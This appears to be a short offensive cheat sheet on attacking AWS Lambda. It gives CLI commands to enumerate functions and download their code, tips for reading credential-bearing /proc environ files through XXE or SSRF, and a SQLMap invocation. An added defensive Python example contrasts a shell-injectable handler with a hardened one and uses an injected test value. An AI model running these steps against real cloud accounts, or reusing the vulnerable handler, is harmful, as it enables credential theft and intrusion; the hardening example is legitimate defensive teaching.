cloud-aws-lambda.md

Welcome to serverless!!!!

AWS Lambda functions are essentially short-lived servers that run your function and return output that can then be used in other applications or consumed by other endpoints.

OS command injection in Lambda

curl "https://API-endpoint/api/stringhere"

aws lambda list-functions
aws lambda get-function --function-name <function-name>
aws lambda get-policy --function-name <function-name>
aws apigateway get-stages --rest-api-id <rest-api-id>

Download function code

aws lambda list-functions
aws lambda get-function --function-name name_we_retrieved_from_above --query 'Code.Location'
wget -O myfunction.zip "URL_from_above_step"

Steal credentials via XXE or SSRF by reading:

/proc/self/environ

If that is blocked, try reading the environment of other processes:

/proc/[1..20]/environ
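
A defensive counterpart to the command injection and environment-read notes above, as an added example that is not part of the original cheat sheet: a Python handler that splices the path value into a shell command, next to a hardened form that allowlists the input, runs the tool without a shell and starts it with a minimal environment so the child process does not inherit the function's `AWS_*` credential variables. The route shape, the handler names and the `echo` stand-in for the real tool are assumptions.

```python
import re
import subprocess

# Assumed route: GET /api/{value} behind an API Gateway proxy integration.
ALLOWED = re.compile(r"[A-Za-z0-9_.]{1,64}")   # no shell metacharacters, no leading "-"
# Minimal child environment: the AWS_* credential variables are not passed on.
CHILD_ENV = {"PATH": "/usr/bin:/bin", "LANG": "C"}


def vulnerable_handler(event, context):
    """'Before' form: the path value is spliced into a shell command line."""
    value = event["pathParameters"]["value"]
    out = subprocess.run("echo " + value, shell=True, capture_output=True, text=True)
    return {"statusCode": 200, "body": out.stdout}


def run_tool(argv):
    """Run argv directly (no shell) with a scrubbed environment and a timeout."""
    return subprocess.run(argv, env=CHILD_ENV, capture_output=True,
                          text=True, timeout=5, check=False)


def hardened_handler(event, context):
    """Reject anything outside the allowlist before a process is started."""
    value = (event.get("pathParameters") or {}).get("value") or ""
    if not ALLOWED.fullmatch(value):
        return {"statusCode": 400, "body": "invalid value"}
    return {"statusCode": 200, "body": run_tool(["/bin/echo", value]).stdout}


if __name__ == "__main__":
    # Constructed events: one ordinary value, one carrying a shell separator.
    for value in ("report_1.txt", "abc; echo INJECTED"):
        event = {"pathParameters": {"value": value}}
        print(repr(value), "->", vulnerable_handler(event, None), hardened_handler(event, None))
```

The function's own process environment still holds the credentials, so scrubbing the child environment only limits what a spawned tool can see. A least-privilege execution role remains the control that bounds what those credentials can do.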

TOOLS

SQLMap to Lambda!!!

python3 main.py sqlmap -r request.txt

Pseudo Lambda Shell